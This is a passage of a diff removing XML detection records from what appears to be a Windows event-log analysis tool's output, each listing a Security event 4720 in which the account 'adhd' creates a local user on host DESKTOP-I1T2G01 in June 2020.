-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Julie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4369</recordid>
-            <time>2020-06-11 22:04:56.277532100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.2775321Z'/&gt;&lt;EventRecordID&gt;4369&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Bruce&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1054&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Bruce&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Bruce</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4363</recordid>
-            <time>2020-06-11 22:04:56.170628400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.1706284Z'/&gt;&lt;EventRecordID&gt;4363&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Louis&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1053&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Louis&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Louis</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4357</recordid>
-            <time>2020-06-11 22:04:56.37053600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.0370536Z'/&gt;&lt;EventRecordID&gt;4357&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Maria&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1052&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Maria&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Maria</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4351</recordid>
-            <time>2020-06-11 22:04:55.956762300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.9567623Z'/&gt;&lt;EventRecordID&gt;4351&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Margaret&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1051&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Margaret&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Margaret</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4345</recordid>
-            <time>2020-06-11 22:04:55.879514700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.8795147Z'/&gt;&lt;EventRecordID&gt;4345&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Emma&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1050&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Emma&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Emma</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4339</recordid>
-            <time>2020-06-11 22:04:55.788962000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.7889620Z'/&gt;&lt;EventRecordID&gt;4339&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gabriel&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1049&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gabriel&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gabriel</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4333</recordid>
-            <time>2020-06-11 22:04:55.689364300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.6893643Z'/&gt;&lt;EventRecordID&gt;4333&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Raymond&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1048&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Raymond&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Raymond</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4327</recordid>
-            <time>2020-06-11 22:04:55.560674300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.5606743Z'/&gt;&lt;EventRecordID&gt;4327&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Joshua&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1047&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Joshua&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Joshua</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4321</recordid>
-            <time>2020-06-11 22:04:55.468251100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.4682511Z'/&gt;&lt;EventRecordID&gt;4321&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kyle&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1046&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kyle&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

